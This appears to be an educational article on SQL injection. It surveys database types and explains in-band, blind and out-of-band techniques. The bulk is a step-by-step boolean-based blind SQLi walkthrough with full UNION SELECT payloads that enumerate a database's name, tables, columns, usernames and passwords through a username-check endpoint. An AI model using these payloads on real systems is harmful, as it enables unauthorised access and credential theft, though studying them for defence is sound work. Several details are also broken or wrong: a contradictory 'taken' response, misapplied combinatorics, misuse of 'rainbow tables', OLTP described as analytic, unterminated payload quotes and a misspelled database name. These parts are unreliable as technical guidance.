SQL INJECTION

WHAT IS A DATABASE?

In general, a database is an organized collection of information stored in a computer system. Databases are managed by DBMS (Database Management Systems). These DBMS in conjunction with the data it manages along with any other applications associated with them make up a database system, sometimes simply called a database.

As stated above, SQL is a programming language used by nearly all relational databases to query, manipulate, and define data and to provide database administrators with access control.

Below are some common database types. For more types of databases, check out this guide by Oracle.

• Relational databases: Relational databases became dominant in the 1980s. Items in a relational database are organized as a set of tables with columns and rows. Relational database technology provides the most efficient and flexible way to access structured information. Common types of relational databases include MySQL, Microsoft SQL Server, Access, PostgreSQL, and SQLite.

• NoSQL databases: A NoSQL, or nonrelational database, allows unstructured and semi-structured data to be stored and manipulated (in contrast to a relational database, which defines how all data inserted into the database must be composed). NoSQL databases grew popular as web applications became more common and more complex. Common types of non-relational or NoSQL databases include MongoDB, Cassandra and ElasticSearch.

• Object-oriented databases: Information in an object-oriented database is represented in the form of objects, as in object-oriented programming.

• Distributed databases: A distributed database consists of two or more files located in different sites. The database may be stored on multiple computers, located in the same physical location, or scattered over different networks.

• OLTP databases. An OLTP database is a speedy, analytic database designed for large numbers of transactions performed by multiple users.

• Self-driving databases: The newest and most groundbreaking type of database, self-driving databases (also known as autonomous databases) are cloud-based and use machine learning to automate database tuning, security, backups, updates, and other routine management tasks traditionally performed by database administrators.

• Open source databases: An open source database system is one whose source code is open source; such databases could be SQL or NoSQL databases.

• Cloud databases: A cloud database is a collection of data, either structured or unstructured, that resides on a private, public, or hybrid cloud computing platform. There are two types of cloud database models: traditional and database as a service (DBaaS). With DBaaS, administrative tasks and maintenance are performed by a service provider.

SQL INJECTIONS

An SQL injection is when SQL commands are input into web applications by any means in order to retrieve, modify, or delete data from databases. There are three main types In-Band, Out-of-band, and Blind which will be discussed below:

• IN-BAND SQL INJECTION

In-Band SQL Injection is the easiest type to detect and exploit; In-Band just refers to the same method of communication being used to exploit the vulnerability and also receive the results, for example, discovering an SQL Injection vulnerability on a website page and then being able to extract data from the database to the same page.

• ERROR BASED SQLi

One common way to enumerate a database is to take advantage of error messages that reveal information that could be used to target information in that database with an SQL injection.

According to Acunetix.com "Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead."

• UNION BASED SQLi

The other most common type of in-band SQLi technique is to use the UNION operator. This technique involves using the UNION operator to combine the results of two or more SELECT statements into a single readable result that would be returned in the HTTP response.

Having information such as the names of tables in a database would help the process, but it is also possible to use brute force to make multiples attempts to combine multiple selections of data with the UNION operator by changing the SELECT statements until two statements of equal length are matched.

• BLIND SQL INJECTION

But what happens when we don't have the benefit of being able to see the error messages being returned to our browser? This is what we call a blind or inferential SQL injection.

According to Acunetix.com Blind or "Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In blind SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as “blind SQL Injection attacks”). Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server."

The two types of blind SQL Injection are Blind-boolean-based SQLi and Blind-time-based SQLi.

• BOOLEAN-BASED BLIND SQLi

Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database, character by character.

• BOOLEAN-BASED BLIND SQLi EXAMPLE

• CONFIRMING SQLi VULNERABILITY

Let's say you have access to an URL that's connected to an API that checks to see if a certain username is taken.

https://website.com/checkuser?username=admin

If the value entered, such as admin is already in use, you get an message of {"taken":true} in the browser. If we entered a username that was not in use, we would get {"taken":true}. On its own, this discovery would be a helpful way to enumerate existing usernames if your method was to use a password cracking program to brute force your way in. There is, however, a way to exploit this particular site with an SQL injection that will give you all the passwords and usernames in the table with patience and a lot of attempt.

How would we use SQL to enumerate the database? Well, we've established that we can get a true or false response with this API on a valid entry. This means that we could employ a Boolean-based blind SQLi as long as we are able to have our SQL queries in the URL run against the website's database.

We can assume that hidden in this URL is an SQL query. After all, whatever API is being used to check if a username is available must be sending a request to a database somewhere in the web app's directory. With enough experience with SQL commands, you may already know that this URL is likely sending the following SQL command to retrieve the right username for the API to process.

select * from users where username = 'admin' LIMIT 1

Let's look at the URL in your browser again.

https://website.com/checkuser?username=admin

Let's first find a username that isn't being used to begin our SQL digging. We don't want an unclaimed username to give us a false positive, so doing this will ensure that a "true" output will be referring to the SQL validity, not the username validity.

For this purpose let's say we enter admin123 and find that it's not taken. So let's try a basic UNION command like the in-band example. The only difference here is that instead of seeing an error message, you will get "false" if the request is invalid, and "true" if the request is valid.

https://website.com/checkuser?username=admin123' UNION SELECT 1;--

So now the SQL query to the web app becomes:

select * from users where username = 'admin123' UNION SELECT 1;-- ' LIMIT 1

This gives us a false output, but don't be discouraged. There are several reasons why the output is false, and one of them is that we only provided one field. If the table that the username is contained in has more than one column then we would get a false output. Let's try adding a new field one at a time until we get a "true" output.

After adding 2 and 3 to the query, we get this along with a true output.

Query: select * from users where username = 'admin123' UNION SELECT 1,2,3;-- ' LIMIT 1

Output: {"taken":true}

This true output cannot mean that admin123 is taken, after all, we have not changed it and every previous attempt was false. What this "true" output means, is that we've tricked the API into giving us an indication that the SQL query we have sent is valid, and it has returned this valid request as a "true" output.

If the browser were displaying the results of our SQL query then we'd be able to see it displayed, unfortunately, since this is a blind-Boolean SQLi we will just have to keep enumerating through dozens of false attempts until we get a "true" output, telling us that we are on the right track. Think of it as a game of "hot" and "cold" or having a friend who can see both your attempts and the database info but can only confirm with one or two knocks if your input is valid or not. It's not the most efficient way to communicate, but over time you can enumerate the names of the database, tables, columns, and even values by using wildcards.

• FINDING THE DATABASE NAME

The next step after confirming the number of columns would be to enumerate the database.

We can find the database name by using the built-in database() method and then trying to guess the name using the like operator along with the % symbol which is a wildcard in SQL.

Let's just start with the following query:

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 where database() like '%';

This should give us the "true" output, meaning that this query is returned as valid. Since we are just using just the wildcard, we know it will return "true" assuming that the rest of the query is set up correctly and teruend to the API as valid. So now it's time to exploit the binary to get the database name.

The trick will be to first find the first letter of the database name by enumerating one character followed by the % symbol. It will turn up false until the right starting character is found. After that, it's a matter of repeating that until you can get the entire name figured out.

We'll start with "q" since it's the top-left character on our keyboard and it will be easier and faster to enumerate in rows of characters on our keyboard rather than doing it alphabetically.

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 where database() like 'q%';

{"taken":false}

Okay, so we've eliminated "q" as the first letter of the database. May not seem like much, but it's a start. If we continued this way, replacing the q with w, then e, them r and so on, we should see the same "false" output until we get to "s"

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 where database() like 's%';

{"taken":true}

Okay, now we have the first letter. What now? Find the second character using the same method. Since we've already found the "s," we'll keep that where it is and enumerate for the second character until we find it. Our next attempt would look like this if we are starting with "q" again.

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 where database() like 'sq%';

Again, we are only changing the next character, not the one we've found. We will do this over and over again until we've found the entire database name.

Some database names may be real words. In this case, guessing what it could be or avoiding unlikely pairings of characters could save time, but the only way to guarantee finding the database will be to enumerate every possible character: including numbers, and special characters. This can take a long time.

How will we know once we have it?

Once you think you have the word or adding an extra character gives false with every possible character then you can test it to see if it's a match. Instead of the like method, we will now use the following query to see if we have our database name. If we have the full correct name, it will return true, if not, it will return false.

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 where database() = 'sql_databse';

{"taken":true}

We've replaced the like method with = and gotten rid of the wildcard since we aren't searching for approximations anymore, we want to confirm that the database name we've discovered through brute force enumeration is a match. Since we have gotten a true output, then yes, we have indeed found the database's name.

• FINDING THE TABLE NAMES

Now that we have the database's name, we can move to the next step, which is to find the names of the tables in the database. Here we have to be careful since there will likely be more than one table name. This means that some tables may be harder to find and would require a lot more enumeration to find all the possible table names.

Consider this: there is a table named: usernames and another called usernumbers. If we use our left-to-right method, then we would find usernumbers first since the "u" is on the top row of letters and the "a" is on the second row. You may go back to check for more table names by changing the first letter, but how likely is it that you will test out every since character for every single position even after you have found a matching letter?

Let me explain further.

Let's say you have found usern so far. Like I said before, you will get a correct match for u and likely move onto the next character instead of continuing to enumerate to find other possible matches. But if you did so, you would see that an a in that spot would also return a "true" value. Now you have a branch in your operation, two possibilities that can be enumerated. But what if there's a third table called usernativeid? Well, that complicated things further since you would get a "true" output for the t before getting one for the m, further decreasing the chances that you will find usernames by doing simple brute force enumeration.

If you extrapolate then you'd see that unless you tried every single possible combination of characters, it's possible that you could miss a lot of possible table names. To check every single possible combination of characters in a 5-character word you're looking at 120 possible combinations. But this number grows exponentially. If we add 3 more characters to find every possible combination of an 8 character table, we now have 40,320 possible combinations!

This is where rainbow tables and common sense guesses could save a lot of time. If you guessed that usernames could be a possible table name you could get lucky and bypass a lot of enumeration, but you run the risk of skipping over a lot of possibilities.

With that in mind, we can begin our search for table names with the following query:

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sql_database' and table_name like 'a%';

Thus begins our search for table names.

Note the name of the database (sql_databse) that we found in the previous step. Without this information, we would not have been able to specify in which database to run this table name search.

With this method, assuming you are going left to right starting with q you would first find a table by the name of users. You can continue to look for other table names, but generally, a table called users will contain usernames, passwords, and other sensitive information that a person taking the time to perform a blind SQLi would be looking for. So for this example, we will stop here for this step and see what's inside this table.

Since we can't display the contents of this table, we will need to continue getting "true" and "false" outputs to see if our guesses match what's inside.

• FINDING THE COLUMN NAMES IN A SELECTED TABLE

The next step will be to figure out what columns are in this table. The method is similar to the one we used to search for tables inside the database, but notice the changes in red.

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 FROM information_schema.columns WHERE table_schema = 'sql_database' and table_name = 'users' and column_name like 'q%';

This process should be getting familiar now.

You would eventually be able to find three columns inside (which we knew from our UNION query earlier!): their names are username, ID, and password.

Once you find and confirm the first column name, it's a good idea to exclude it from the like method's results by adding and column_name !='(name of the column you want to exclude)' to the end of our query, but before the semi-colon that ends it. The != operator is known as a not-equal-to operator, basically the opposite of the = operator.

So let's say we find username first, and we want to exclude it from our further enumeration, we would do so like this:

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 FROM information_schema.columns WHERE table_schema = 'sql_database' and table_name = 'users' and column_name like 'q%' and column_name !='username';

Eventually, you would find all the columns you need. In this case, we are most interested in the username and password columns since the info in those two columns would allow us access to the admin login.

• FINDING DATA ENTRIES IN THE SELECTED COLUMNS

With our columns discovered, we can begin to enumerate the information inside a column by targeting it with the like method once again.

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 from users where username like 'q%;

Notice how much simpler this query is than the last ones? The reason why is because we know the name of the table, and we know the columns. We can now specify that we want to know if there is an entry in the username column in the users table that begins with the letter q. If you know what username to target, then you can check it, but enumeration is still possible here if you are unsure of the available usernames.

You would do the same for the password column. Note the difference in the query:

https://website.com/checkuser?username=admin123' UNION SELECT 1,2,3 from users where password like 'q%;

You could, with sufficient time and attempts, enumerate any username and password combination doing this, although complex passwords with many characters could take an unwieldy amount of time to enumerate. This is why having complex and long passwords are always preferable from a security standpoint.

• OUT-OF-BAND SQL INJECTION

According to Acunetix.com "Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.

Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).

Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls."